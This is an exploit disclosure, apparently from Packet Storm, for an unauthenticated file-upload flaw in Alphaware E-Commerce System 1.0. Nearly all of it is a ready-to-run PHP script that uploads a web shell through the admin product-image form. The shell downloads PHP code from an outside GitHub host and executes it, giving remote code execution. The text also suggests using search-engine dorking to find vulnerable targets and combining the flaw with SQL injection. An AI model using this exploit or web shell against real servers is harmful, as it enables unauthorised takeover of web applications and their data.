IndoushkaPACKETSTORM:180292
`=============================================================================================================================================
| # Title : Alphaware E-CommerceSystem 1.0 php code injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |
| # Vendor : https://www.sourcecodester.com/php/11676/alphaware-simple-e-commerce-system.html |
=============================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] This payload injects php code of your choice into an SHELL.php file.
[+] The web application allows for an unauthenticated file upload which can result in a Remote Code Execution.
combine this issue with an sql injection to retrieve the randomised name of our uploaded php shell.
[+] save payload as poc.php
[+] usage from cmd : C:\www\test>php 1.php 127.0.0.1
[+] payload :
<?php
function file_upload($target_ip) {
$file_name = "indoushka.php";
$webshell_payload = "<?php
\$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';
\$ch = curl_init();
curl_setopt(\$ch, CURLOPT_URL, \$url);
curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);
\$output = curl_exec(\$ch);
curl_close(\$ch);
if (\$output) {
// Safely include the content of the remote PHP file
include 'data://text/plain;base64,' . base64_encode(\$output);
}
?>";
$post_fields = array(
'add' => '',
'product_image' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),
'product_name' => 'inouva',
'product_price' => '123',
'product_size' => '99',
'brand' => 'N0_name',
'category' => 'Hackers',
'qty' => '1'
);
echo "(+) PHP Code Injection ...\n";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$target_ip/alphaware/admin/admin_football.php");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
echo "(+) Shell uploaded successfully.\n";
echo "(+) Access the shell at: http://$target_ip/alphaware/photo/$file_name\n";
}
if ($argc != 2) {
echo "(+) Usage: php " . $argv[0] . " <target ip>\n";
echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";
exit(-1);
}
$target_ip = $argv[1];
file_upload($target_ip);
[+] Path : http://127.0.0.1/alphaware/photo/
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================
`